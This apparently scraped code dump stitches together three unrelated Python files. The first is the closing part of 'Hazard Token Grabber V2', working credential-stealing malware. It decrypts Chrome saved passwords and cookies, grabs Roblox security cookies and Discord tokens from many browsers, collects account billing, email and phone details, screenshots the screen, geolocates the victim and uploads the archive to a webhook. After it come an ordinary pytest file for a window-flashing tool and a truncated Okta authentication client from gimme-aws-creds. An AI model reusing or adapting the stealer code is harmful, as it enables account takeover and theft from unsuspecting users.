if url != "":
f.write(f"Domain: {url}\nUser: {username}\nPass: {decrypted_password}\n\n")
except Exception:
pass
cursor.close()
conn.close()
try:
os.remove("Loginvault.db")
except Exception:
pass
def grabCookies(self):
master_key = self.get_master_key(self.appdata+'\\Google\\Chrome\\User Data\\Local State')
login_db = self.appdata+'\\Google\\Chrome\\User Data\\default\\Network\\cookies'
try:
shutil.copy2(login_db, "Loginvault.db")
except Exception:
pass
conn = sqlite3.connect("Loginvault.db")
cursor = conn.cursor()
with open(self.tempfolder+"\\Google Cookies.txt", "w", encoding="cp437", errors='ignore') as f:
try:
cursor.execute("SELECT host_key, name, encrypted_value from cookies")
for r in cursor.fetchall():
host = r[0]
user = r[1]
decrypted_cookie = self.decrypt_val(r[2], master_key)
if host != "": f.write(f"Host: {host}\nUser: {user}\nCookie: {decrypted_cookie}\n\n")
if '_|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items.|_' in decrypted_cookie: self.robloxcookies.append(decrypted_cookie)
except Exception:
pass
cursor.close()
conn.close()
try:
os.remove("Loginvault.db")
except Exception:
pass
def grabRobloxCookie(self):
try:
self.robloxcookies.append(subprocess.check_output(r"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com' -Name .ROBLOSECURITY", creationflags=0x08000000).decode().rstrip())
except Exception:
pass
if self.robloxcookies:
with open(self.tempfolder+"\\Roblox Cookies.txt", "w") as f:
for i in self.robloxcookies: f.write(i+'\n')
def grabTokens(self):
paths = {
'Discord': self.roaming + r'\\discord\\Local Storage\\leveldb\\',
'Discord Canary': self.roaming + r'\\discordcanary\\Local Storage\\leveldb\\',
'Lightcord': self.roaming + r'\\Lightcord\\Local Storage\\leveldb\\',
'Discord PTB': self.roaming + r'\\discordptb\\Local Storage\\leveldb\\',
'Opera': self.roaming + r'\\Opera Software\\Opera Stable\\Local Storage\\leveldb\\',
'Opera GX': self.roaming + r'\\Opera Software\\Opera GX Stable\\Local Storage\\leveldb\\',
'Amigo': self.appdata + r'\\Amigo\\User Data\\Local Storage\\leveldb\\',
'Torch': self.appdata + r'\\Torch\\User Data\\Local Storage\\leveldb\\',
'Kometa': self.appdata + r'\\Kometa\\User Data\\Local Storage\\leveldb\\',
'Orbitum': self.appdata + r'\\Orbitum\\User Data\\Local Storage\\leveldb\\',
'CentBrowser': self.appdata + r'\\CentBrowser\\User Data\\Local Storage\\leveldb\\',
'7Star': self.appdata + r'\\7Star\\7Star\\User Data\\Local Storage\\leveldb\\',
'Sputnik': self.appdata + r'\\Sputnik\\Sputnik\\User Data\\Local Storage\\leveldb\\',
'Vivaldi': self.appdata + r'\\Vivaldi\\User Data\\Default\\Local Storage\\leveldb\\',
'Chrome SxS': self.appdata + r'\\Google\\Chrome SxS\\User Data\\Local Storage\\leveldb\\',
'Chrome': self.appdata + r'\\Google\\Chrome\\User Data\\Default\\Local Storage\\leveldb\\',
'Epic Privacy Browser': self.appdata + r'\\Epic Privacy Browser\\User Data\\Local Storage\\leveldb\\',
'Microsoft Edge': self.appdata + r'\\Microsoft\\Edge\\User Data\\Defaul\\Local Storage\\leveldb\\',
'Uran': self.appdata + r'\\uCozMedia\\Uran\\User Data\\Default\\Local Storage\\leveldb\\',
'Yandex': self.appdata + r'\\Yandex\\YandexBrowser\\User Data\\Default\\Local Storage\\leveldb\\',
'Brave': self.appdata + r'\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Storage\\leveldb\\',
'Iridium': self.appdata + r'\\Iridium\\User Data\\Default\\Local Storage\\leveldb\\'
}
for _, path in paths.items():
if not os.path.exists(path):
continue
if not "discord" in path:
for file_name in os.listdir(path):
if not file_name.endswith('.log') and not file_name.endswith('.ldb'):
continue
for line in [x.strip() for x in open(f'{path}\\{file_name}', errors='ignore').readlines() if x.strip()]:
for regex in (self.regex):
for token in findall(regex, line):
self.checkToken(token)
else:
if os.path.exists(self.roaming+'\\discord\\Local State'):
for file_name in os.listdir(path):
if not file_name.endswith('.log') and not file_name.endswith('.ldb'):
continue
for line in [x.strip() for x in open(f'{path}\\{file_name}', errors='ignore').readlines() if x.strip()]:
for y in findall(self.encrypted_regex, line):
token = self.decrypt_val(base64.b64decode(y.split('dQw4w9WgXcQ:')[1]), self.get_master_key(self.roaming+'\\discord\\Local State'))
self.checkToken(token)
if os.path.exists(self.roaming+"\\Mozilla\\Firefox\\Profiles"):
for path, _, files in os.walk(self.roaming+"\\Mozilla\\Firefox\\Profiles"):
for _file in files:
if not _file.endswith('.sqlite'):
continue
for line in [x.strip() for x in open(f'{path}\\{_file}', errors='ignore').readlines() if x.strip()]:
for regex in (self.regex):
for token in findall(regex, line):
self.checkToken(token)
def neatifyTokens(self):
f = open(self.tempfolder+"\\Discord Info.txt", "w", encoding="cp437", errors='ignore')
for token in self.tokens:
j = requests.get(self.baseurl, headers=self.getHeaders(token)).json()
user = j.get('username') + '#' + str(j.get("discriminator"))
badges = ""
flags = j['flags']
if (flags == 1): badges += "Staff, "
if (flags == 2): badges += "Partner, "
if (flags == 4): badges += "Hypesquad Event, "
if (flags == 8): badges += "Green Bughunter, "
if (flags == 64): badges += "Hypesquad Bravery, "
if (flags == 128): badges += "HypeSquad Brillance, "
if (flags == 256): badges += "HypeSquad Balance, "
if (flags == 512): badges += "Early Supporter, "
if (flags == 16384): badges += "Gold BugHunter, "
if (flags == 131072): badges += "Verified Bot Developer, "
if (badges == ""): badges = "None"
email = j.get("email")
phone = j.get("phone") if j.get("phone") else "No Phone Number attached"
try:
nitro_data = requests.get(self.baseurl+'/billing/subscriptions', headers=self.getHeaders(token)).json()
except Exception:
pass
has_nitro = False
has_nitro = bool(len(nitro_data) > 0)
try:
billing = bool(len(json.loads(requests.get(self.baseurl+"/billing/payment-sources", headers=self.getHeaders(token)).text)) > 0)
except Exception:
pass
f.write(f"{' '*17}{user}\n{'-'*50}\nToken: {token}\nHas Billing: {billing}\nNitro: {has_nitro}\nBadges: {badges}\nEmail: {email}\nPhone: {phone}\n\n")
f.close()
def screenshot(self):
image = ImageGrab.grab(
bbox=None,
include_layered_windows=False,
all_screens=False,
xdisplay=None
)
image.save(self.tempfolder + "\\Screenshot.png")
image.close()
def SendInfo(self):
wname = self.getProductValues()[0]
wkey = self.getProductValues()[1]
ip = country = city = region = googlemap = "None"
try:
data = requests.get("https://ipinfo.io/json").json()
ip = data['ip']
city = data['city']
country = data['country']
region = data['region']
googlemap = "https://www.google.com/maps/search/google+map++" + data['loc']
except Exception:
pass
_zipfile = os.path.join(self.appdata, f'Hazard.V2-[{os.getlogin()}].zip')
zipped_file = zipfile.ZipFile(_zipfile, "w", zipfile.ZIP_DEFLATED)
abs_src = os.path.abspath(self.tempfolder)
for dirname, _, files in os.walk(self.tempfolder):
for filename in files:
absname = os.path.abspath(os.path.join(dirname, filename))
arcname = absname[len(abs_src) + 1:]
zipped_file.write(absname, arcname)
zipped_file.close()
files = os.listdir(self.tempfolder)
for f in files:
self.files += f"\n{f}"
self.fileCount = f"{len(files)} Files Found: "
embed = {
"avatar_url":"https://raw.githubusercontent.com/Rdimo/images/master/Hazard-Token-Grabber-V2/Big_hazard.gif",
"embeds": [
{
"author": {
"name": "Hazard Token Grabber.V2",
"url": "https://github.com/Rdimo/Hazard-Token-Grabber-V2",
"icon_url": "https://raw.githubusercontent.com/Rdimo/images/master/Hazard-Token-Grabber-V2/Small_hazard.gif"
},
"description": f'**{os.getlogin()}** Just ran Hazard Token Grabber.V2\n```fix\nComputerName: {os.getenv("COMPUTERNAME")}\n{wname}: {wkey if wkey else "No Product Key"}\nIP: {ip}\nCity: {city}\nRegion: {region}\nCountry: {country}```[Google Maps Location]({googlemap})\n```fix\n{self.fileCount}{self.files}```',
"color": 16119101,
"thumbnail": {
"url": "https://raw.githubusercontent.com/Rdimo/images/master/Hazard-Token-Grabber-V2/Hazard.gif"
},
"footer": {
"text": "Rdimo#6969 https://github.com/Rdimo/Hazard-Token-Grabber-V2"
}
}
]
}
requests.post(self.webhook, json=embed)
requests.post(self.webhook, files={'upload_file': open(_zipfile,'rb')})
os.remove(_zipfile)
if __name__ == "__main__":
if os.name == "nt": Hazard_Token_Grabber_V2()
|
test_flasher.py
|
"""Test suite for the server module."""
from threading import Thread
from time import sleep
try:
from unittest.mock import (
call,
MagicMock,
)
except ImportError:
from mock import (
call,
MagicMock,
)
from pytest import (
approx,
mark,
)
import flashfocus.xutil as xutil
from test.helpers import (
change_focus,
SelfDestructingFocusWait,
WindowWatcher,
)
@mark.parametrize('pre_opacity', [
(0.8), (1), (None), (0.5)
])
def test_flash_window(flasher, window, pre_opacity):
if pre_opacity:
xutil.set_opacity(window, pre_opacity)
expected_opacity = (
[pre_opacity] +
flasher.compute_flash_series(pre_opacity) +
[pre_opacity])
# WindowWatcher collapses runs of the same value
if all(x == expected_opacity[0] for x in expected_opacity):
expected_opacity = [expected_opacity[0]]
watcher = WindowWatcher(window)
watcher.start()
flasher.flash_window(window)
assert watcher.report() == approx(expected_opacity, 0.01)
def test_flash_nonexistant_window_ignored(flasher):
flasher.flash_window(0)
@mark.parametrize('focus_indices,flash_indices', [
# Test normal usage
([1, 0, 1], [1, 0, 1]),
# Test that focusing on same window twice only flashes once
([0, 0], [0])
])
def test_monitor_focus(flasher, windows, focus_indices, flash_indices,
monkeypatch):
focus_shifts = [windows[i] for i in focus_indices]
expected_calls = [call(windows[i]) for i in flash_indices]
flasher.flash_window = MagicMock()
monkeypatch.setattr(
xutil, 'wait_for_focus_shift',
SelfDestructingFocusWait(len(focus_indices) + 2))
p = Thread(target=flasher.monitor_focus)
p.start()
for window in focus_shifts:
change_focus(window)
sleep(0.2)
# This would normally be done by the flash_window method
flasher.locked_windows.discard(window)
p.join()
assert flasher.flash_window.call_args_list == expected_calls
@mark.parametrize(
'flash_opacity,preflash_opacity,ntimepoints,expected_result', [
# test typical usecase
(0.8, None, 4, [0.8, 0.85, 0.9, 0.95]),
# test that it still works when flash opacity > preflash opacity
(1, 0.8, 4, [1, 0.95, 0.9, 0.85]),
# test that opacity=1 gives same result as opacity=none
(0.8, 1, 4, [0.8, 0.85, 0.9, 0.95]),
# test for single chunk
(0.8, 1, 1, [0.8])
]
)
def test_compute_flash_series(flash_opacity, preflash_opacity, ntimepoints,
expected_result, flasher):
flasher.flash_opacity = flash_opacity
flasher.ntimepoints = ntimepoints
assert (flasher.compute_flash_series(preflash_opacity) ==
approx(expected_result, 0.0001))
if preflash_opacity:
assert (flasher.flash_series_hash[preflash_opacity] ==
approx(expected_result, 0.0001))
|
okta.py
|
"""
Copyright 2016-present Nike, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
You may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and* limitations under the License.*
"""
import base64
import copy
import getpass
import re
import socket
import time
import uuid
import webbrowser
from codecs import decode
from multiprocessing import Process
from urllib.parse import parse_qs
from urllib.parse import urlparse, quote
import keyring
import requests
from bs4 import BeautifulSoup
from fido2.utils import websafe_decode
from keyring.backends.fail import Keyring as FailKeyring
from keyring.errors import PasswordDeleteError
from requests.adapters import HTTPAdapter, Retry
from gimme_aws_creds.u2f import FactorU2F
from gimme_aws_creds.webauthn import WebAuthnClient, FakeAssertion
from . import errors, ui, version, duo
from .errors import GimmeAWSCredsMFAEnrollStatus
from .registered_authenticators import RegisteredAuthenticators
class OktaClient(object):
"""
The Okta Client Class performs the necessary API
calls to Okta to get temporary AWS credentials. An
Okta API key and URL must be provided.
"""
KEYRING_SERVICE = 'gimme-aws-creds'
KEYRING_ENABLED = not isinstance(keyring.get_keyring(), FailKeyring)
def __init__(self, gac_ui, okta_org_url, verify_ssl_certs=True, device_token=None):
"""
:type gac_ui: ui.UserInterface
:param okta_org_url: Base URL string for Okta IDP.
:param verify_ssl_certs: Enable/disable SSL verification
"""
self.ui = gac_ui
self._okta_org_url = okta_org_url
self._verify_ssl_certs = verify_ssl_certs
if verify_ssl_certs is False:
requests.packages.urllib3.disable_warnings()
self._username = None
self._password = None
self._preferred_mfa_type = None
self._mfa_code = None
self._remember_device = None
self._use_oauth_access_token = False
self._use_oauth_id_token = False
self._oauth_access_token = None
self._oauth_id_token = None
self._jar = requests.cookies.RequestsCookieJar()
# Allow up to 5 retries on requests to Okta in case we have network issues
self._http_client = requests.Session()
self._http_client.cookies = self._jar
self.device_token = device_token
retries = Retry(total=5, backoff_factor=1,
method_whitelist=['GET', 'POST'])
self._http_client.mount('https://', HTTPAdapter(max_retries=retries))
@property
def device_token(self):
return self._http_client.cookies.get('DT')
@device_token.setter
def device_token(self, device_token):
if device_token is not None:
match = re.search(r'^https://(.*)/?', self._okta_org_url)
self._http_client.cookies.set('DT', device_token, domain=match.group(1), path='/')
def set_username(self, username):
self._username = username
def set_password(self, password):
self._password = password
def set_preferred_mfa_type(self, preferred_mfa_type):
self._preferred_mfa_type = preferred_mfa_type
def set_mfa_code(self, mfa_code):
self._mfa_code = mfa_code
def set_remember_device(self, remember_device):
self._remember_device = bool(remember_device)
def use_oauth_access_token(self, val=True):
self._use_oauth_access_token = val
def use_oauth_id_token(self, val=True):
self._use_oauth_id_token = val
def stepup_auth(self, embed_link, state_token=None):
""" Login to Okta using the Step-up authentication flow"""
flow_state = self._get_initial_flow_state(embed_link, state_token)
while flow_state.get('apiResponse', {}).get('status') != 'SUCCESS':
time.sleep(0.5)
flow_state = self._next_login_step(
flow_state.get('stateToken'), flow_state.get('apiResponse'))
return flow_state['apiResponse']
def stepup_auth_saml(self, embed_link, state_token=None):
""" Login to a SAML-protected service using the Step-up authentication flow"""
api_response = self.stepup_auth(embed_link, state_token)
# if a session token is in the API response, we can use that to authenticate
if 'sessionToken' in api_response:
saml_response = self.get_saml_response(
embed_link + '?sessionToken=' + api_response['sessionToken'])
else:
saml_response = self.get_saml_response(
api_response['_links']['next']['href'])
login_result = self._http_client.post(
saml_response['TargetUrl'],
data=saml_response,
verify=self._verify_ssl_certs
)
return login_result.text
def auth(self):
""" Login to Okta using the authentication API"""
flow_state = self._login_username_password(None, self._okta_org_url + '/api/v1/authn')
while flow_state.get('apiResponse', {}).get('status') != 'SUCCESS':
time.sleep(0.5)
flow_state = self._next_login_step(
flow_state.get('apiResponse', {}).get('stateToken'), flow_state.get('apiResponse'))
return flow_state['apiResponse']
def auth_session(self, **kwargs):
""" Authenticate the user and return the Okta Session ID and username"""
login_response = self.auth()
session_url = self._okta_org_url + '/login/sessionCookieRedirect'
if 'redirect_uri' not in kwargs:
redirect_uri = 'http://localhost:8080/login'
else:
redirect_uri = kwargs['redirect_uri']
params = {
'token': login_response['sessionToken'],
'redirectUrl': redirect_uri
}
response = self._http_client.get(
session_url,
params=params,
headers=self._get_headers(),
verify=self._verify_ssl_certs,
allow_redirects=False
)
return {
"username": login_response['_embedded']['user']['profile']['login'],
"session": response.cookies['sid'],
"device_token": self._http_client.cookies['DT']
}
def auth_oauth(self, client_id, **kwargs):
""" Login to Okta and retrieve access token, ID token or both """
login_response = self.auth()
if 'access_token' not in kwargs:
access_token = True
else:
access_token = kwargs['access_token']
if 'id_token' not in kwargs:
id_token = False
else:
id_token = kwargs['id_token']
if 'scopes' not in kwargs:
scopes = ['openid']
else:
scopes = kwargs['scopes']
response_types = []
if id_token is True:
response_types.append('id_token')
if access_token is True:
response_types.append('token')
if 'authorization_server' not in kwargs:
oauth_url = self._okta_org_url + '/oauth2/v1/authorize'
else:
oauth_url = self._okta_org_url + '/oauth2/' + kwargs['authorization_server'] + '/v1/authorize'
if 'redirect_uri' not in kwargs:
redirect_uri = 'http://localhost:8080/login'
else:
redirect_uri = kwargs['redirect_uri']
if 'nonce' not in kwargs:
nonce = uuid.uuid4().hex
else:
nonce = kwargs['nonce']
if 'state' not in kwargs:
state = 'auth_oauth'
else:
state = kwargs['state']
params = {
'sessionToken': login_response['sessionToken'],
'client_id': client_id,
'redirect_uri': redirect_uri,
'nonce': nonce,
'state': state,
'response_type': ' '.join(response_types),
'scope': ' '.join(scopes)
}
response = self._http_client.get(
oauth_url,
params=params,
headers=self._get_headers(),
verify=self._verify_ssl_certs,
allow_redirects=False
)
response.raise_for_status()
url_parse_results = urlparse(response.headers['Location'])
query_result = parse_qs(url_parse_results.fragment)
tokens = {}
if 'access_token' in query_result:
tokens['access_token'] = query_result['access_token'][0]
self._oauth_access_token = query_result['access_token'][0]
if 'id_token' in query_result:
tokens['id_token'] = query_result['id_token'][0]
self._oauth_id_token = query_result['id_token'][0]
return tokens
@staticmethod
def _get_headers():
"""sets the default headers"""
headers = {
'User-Agent': "gimme-aws-creds {}".format(version),
'Accept': 'application/json',
'Content-Type': 'application/json',
}
return headers
def _get_initial_flow_state(self, embed_link, state_token=None):
""" Starts the authentication flow with Okta"""
if state_token is None:
response = self._http_client.get(
embed_link, allow_redirects=False)
response.raise_for_status()
url_parse_results = urlparse(response.headers['Location'])
state_token = parse_qs(url_parse_results.query)['stateToken'][0]
response = self._http_client.post(
self._okta_org_url + '/api/v1/authn',
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
return {'stateToken': state_token, 'apiResponse': response.json()}
def _next_login_step(self, state_token, login_data):
""" decide what the next step in the login process is"""
if 'errorCode' in login_data:
raise errors.GimmeAWSCredsError(
"LOGIN ERROR: {} | Error Code: {}".format(login_data['errorSummary'], login_data['errorCode']), 2)
status = login_data['status']
if status == 'UNAUTHENTICATED':
return self._login_username_password(state_token, login_data['_links']['next']['href'])
elif status == 'LOCKED_OUT':
raise errors.GimmeAWSCredsError("Your Okta access has been locked out due to failed login attempts.", 2)
elif status == 'MFA_ENROLL':
raise GimmeAWSCredsMFAEnrollStatus()
elif status == 'MFA_REQUIRED':
return self._login_multi_factor(state_token, login_data)
elif status == 'MFA_CHALLENGE':
if login_data['_embedded']['factor']['factorType'] == 'u2f':
return self._check_u2f_result(state_token, login_data)
if login_data['_embedded']['factor']['factorType'] == 'webauthn':
return self._check_webauthn_result(state_token, login_data)
if 'factorResult' in login_data and login_data['factorResult'] == 'WAITING':
return self._check_push_result(state_token, login_data)
else:
return self._login_input_mfa_challenge(state_token, login_data['_links']['next']['href'])
else:
raise RuntimeError('Unknown login status: ' + status)
def _print_correct_answer(self, answer):
""" prints the correct answer to the additional factor authentication step in Okta Verify"""
self.ui.info("Additional factor correct answer is: " + str(answer))
def _login_username_password(self, state_token, url):
""" login to Okta with a username and password"""
creds = self._get_username_password_creds()
login_json = {
'username': creds['username'],
'password': creds['password']
}
# If this isn't a Step-up auth flow, we won't have a stateToken
if state_token is not None:
login_json['stateToken'] = state_token
response = self._http_client.post(
url,
json=login_json,
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response_data = response.json()
if response.status_code == 200:
pass
# Handle known Okta error codes
# ref: https://developer.okta.com/docs/reference/error-codes/#example-errors-listed-by-http-return-code
elif response.status_code in [400, 401, 403, 404, 409, 429, 500, 501, 503]:
if response_data['errorCode'] == "E0000004":
if self.KEYRING_ENABLED:
try:
self.ui.info("Stored password is invalid, clearing. Please try again")
keyring.delete_password(self.KEYRING_SERVICE, creds['username'])
except PasswordDeleteError:
pass
raise errors.GimmeAWSCredsError(
"LOGIN ERROR: {} | Error Code: {}".format(response_data['errorSummary'], response_data['errorCode']), 2)
# If the error code isn't one we know how to handle, raise an exception
else:
response.raise_for_status()
func_result = {'apiResponse': response_data}
if 'stateToken' in response_data:
func_result['stateToken'] = response_data['stateToken']
return func_result
def _login_send_sms(self, state_token, factor):
""" Send SMS message for second factor authentication"""
response = self._http_client.post(
factor['_links']['verify']['href'],
params={'rememberDevice': self._remember_device},
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
self.ui.info("A verification code has been sent to " + factor['profile']['phoneNumber'])
response_data = response.json()
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
def _login_send_call(self, state_token, factor):
""" Send Voice call for second factor authentication"""
response = self._http_client.post(
factor['_links']['verify']['href'],
params={'rememberDevice': self._remember_device},
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
self.ui.info("You should soon receive a phone call at " + factor['profile']['phoneNumber'])
response_data = response.json()
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
def _login_send_push(self, state_token, factor):
""" Send 'push' for the Okta Verify mobile app """
response = self._http_client.post(
factor['_links']['verify']['href'],
params={'rememberDevice': self._remember_device},
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
self.ui.info("Okta Verify push sent...")
response_data = response.json()
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
def _login_input_webauthn_challenge(self, state_token, factor):
""" Retrieve nonce """
response = self._http_client.post(
factor['_links']['verify']['href'],
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
self.ui.info("Challenge with security keys ...")
response_data = response.json()
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
@staticmethod
def get_available_socket():
"""Get available socket, but requesting 0 and allowing OS to provide ephemeral open port"""
s = socket.socket()
s.bind(('127.0.0.1', 0))
server_address = s.getsockname()
return server_address
def _login_duo_challenge(self, state_token, factor):
""" Duo MFA challenge """
passcode = self._mfa_code
if factor['factorType'] is None:
# Prompt user for which Duo factor to use
raise duo.FactorRequired(factor['id'], state_token)
if factor['factorType'] == "passcode" and not passcode:
try:
passcode = self.ui.input("Enter verification code(remember to refresh token between uses): ")
except Exception:
raise duo.PasscodeRequired(factor['id'], state_token)
response_data = self._get_response_data(factor['_links']['verify']['href'], state_token)
verification = response_data['_embedded']['factor']['_embedded']['verification']
socket_addr = self.get_available_socket()
auth = None
duo_client = duo.Duo(self.ui, verification, state_token, socket_addr, factor['factorType'])
if factor['factorType'] == "web":
# Duo Web via local browser
self.ui.info("Duo required; opening browser...")
proc = Process(target=duo_client.trigger_web_duo)
proc.start()
time.sleep(2)
webbrowser.open_new('http://{host}:{port}/duo.html'.format(host=socket_addr[0], port=socket_addr[1]))
elif factor['factorType'] == "passcode":
# Duo auth with OTP code without a browser
self.ui.info("Duo required; using OTP...")
auth = duo_client.trigger_duo(passcode=passcode)
else:
# Duo Auth without the browser
self.ui.info("Duo required; check your phone...")
auth = duo_client.trigger_duo()
if auth is not None:
self.mfa_callback(auth, verification, state_token)
try:
response_data = self._get_response_data(response_data.get('_links')['next']['href'], state_token)
while response_data['status'] != 'SUCCESS':
if response_data.get('factorResult', 'REJECTED') == 'REJECTED':
self.ui.warning("Duo Push REJECTED")
return None
if response_data.get('factorResult', 'TIMEOUT') == 'TIMEOUT':
self.ui.warning("Duo Push TIMEOUT")
return None
self.ui.info("Waiting for MFA success...")
time.sleep(2)
response_data = self._get_response_data(response_data.get('_links')['next']['href'], state_token)
except KeyboardInterrupt:
self.ui.warning("User canceled waiting for MFA success.")
raise
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
# return None
def _get_response_data(self, href, state_token):
response = self._http_client.post(href,
params={'rememberDevice': self._remember_device},
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response_data = response.json()
return response_data
def mfa_callback(self, auth, verification, state_token):
"""Do callback to Okta with the info from the MFA provider
Args:
auth: String auth from MFA provider to send in the callback
verification: Dict of details used in Okta API calls
state_token: String Okta state token
"""
app = verification['signature'].split(":")[1]
response_sig = "{}:{}".format(auth, app)
callback_params = "stateToken={}&sig_response={}".format(
state_token, response_sig)
url = "{}?{}".format(
verification['_links']['complete']['href'],
callback_params)
ret = self._http_client.post(url)
if ret.status_code != 200:
raise Exception("Bad status from Okta callback {}".format(
ret.status_code))
def _login_multi_factor(self, state_token, login_data):
""" handle multi-factor authentication with Okta"""
factor = self._choose_factor(login_data['_embedded']['factors'])
if factor['provider'] == 'DUO':
return self._login_duo_challenge(state_token, factor)
elif factor['factorType'] == 'sms':
return self._login_send_sms(state_token, factor)
elif factor['factorType'] == 'call':
return self._login_send_call(state_token, factor)
elif factor['factorType'] == 'token:software:totp':
return self._login_input_mfa_challenge(state_token, factor['_links']['verify']['href'])
elif factor['factorType'] == 'token':
return self._login_input_mfa_challenge(state_token, factor['_links']['verify']['href'])
elif factor['factorType'] == 'push':
return self._login_send_push(state_token, factor)
elif factor['factorType'] == 'u2f':
return self._login_input_webauthn_challenge(state_token, factor)
elif factor['factorType'] == 'webauthn':
return self._login_input_webauthn_challenge(state_token, factor)
elif factor['factorType'] == 'token:hardware':
return self._login_input_mfa_challenge(state_token, factor['_links']['verify']['href'])
def _login_input_mfa_challenge(self, state_token, next_url):
""" Submit verification code for SMS or TOTP authentication methods"""
pass_code = self._mfa_code
if pass_code is None:
pass_code = self.ui.input("Enter verification code: ", hidden=True)
response = self._http_client.post(
next_url,
params={'rememberDevice': self._remember_device},
json={'stateToken': state_token, 'passCode': pass_code},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
response_data = response.json()
if 'status' in response_data and response_data['status'] == 'SUCCESS':
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
else:
return {'stateToken': None, 'sessionToken': None, 'apiResponse': response_data}
def _check_push_result(self, state_token, login_data):
""" Check Okta API to see if the push request has been responded to"""
time.sleep(1)
response = self._http_client.post(
login_data['_links']['next']['href'],
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
response_data = response.json()
try:
if '_embedded' in response_data['_embedded']['factor']:
if response_data['_embedded']['factor']['_embedded']['challenge']['correctAnswer']:
if self._print_correct_answer:
self._print_correct_answer(response_data['_embedded']['factor']['_embedded']['challenge']['correctAnswer'])
self._print_correct_answer = None
except:
pass
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
def _check_u2f_result(self, state_token, login_data):
# should be deprecated soon as OKTA move forward webauthN
# just for backward compatibility
nonce = login_data['_embedded']['factor']['_embedded']['challenge']['nonce']
credential_id = login_data['_embedded']['factor']['profile']['credentialId']
app_id = login_data['_embedded']['factor']['profile']['appId']
verify = FactorU2F(self.ui, app_id, nonce, credential_id)
try:
client_data, signature = verify.verify()
except Exception:
signature = b'fake'
client_data = b'fake'
client_data = str(base64.urlsafe_b64encode(client_data), "utf-8")
signature_data = str(base64.urlsafe_b64encode(signature), 'utf-8')
response = self._http_client.post(
login_data['_links']['next']['href'] + "?rememberDevice=false",
json={'stateToken': state_token, 'clientData': client_data, 'signatureData': signature_data},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
response_data = response.json()
if 'status' in response_data and response_data['status'] == 'SUCCESS':
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
else:
return {'stateToken': None, 'sessionToken': None, 'apiResponse': response_data}
def _check_webauthn_result(self, state_token, login_data):
""" wait for webauthN challenge """
nonce = login_data['_embedded']['factor']['_embedded']['challenge']['challenge']
credential_id = login_data['_embedded']['factor']['profile']['credentialId']
""" Authenticator """
webauthn_client = WebAuthnClient(self.ui, self._okta_org_url, nonce, credential_id)
# noinspection PyBroadException
try:
client_data, assertion = webauthn_client.verify()
except Exception:
client_data = b'fake'
assertion = FakeAssertion()
client_data = str(base64.urlsafe_b64encode(client_data), "utf-8")
signature_data = base64.b64encode(assertion.signature).decode('utf-8')
auth_data = base64.b64encode(assertion.auth_data).decode('utf-8')
response = self._http_client.post(
login_data['_links']['next']['href'] + "?rememberDevice=false",
json={'stateToken': state_token, 'clientData': client_data, 'signatureData': signature_data,
'authenticatorData': auth_data},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
response_data = response.json()
if 'status' in response_data and response_data['status'] == 'SUCCESS':
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
else:
return {'stateToken': None, 'sessionToken': None, 'apiResponse': response_data}
def get_saml_response(self, url):
""" return the base64 SAML value object from the SAML Response"""
response = self._http_client.get(url, verify=self._verify_ssl_certs)
response.raise_for_status()
saml_response = None
relay_state = None
form_action = None
saml_soup = BeautifulSoup(response.text, "html.parser")
if saml_soup.find('form') is not None:
form_action = saml_soup.find('form').get('action')
for input_tag in saml_soup.find_all('input'):
if input_tag.get('name') == 'SAMLResponse':
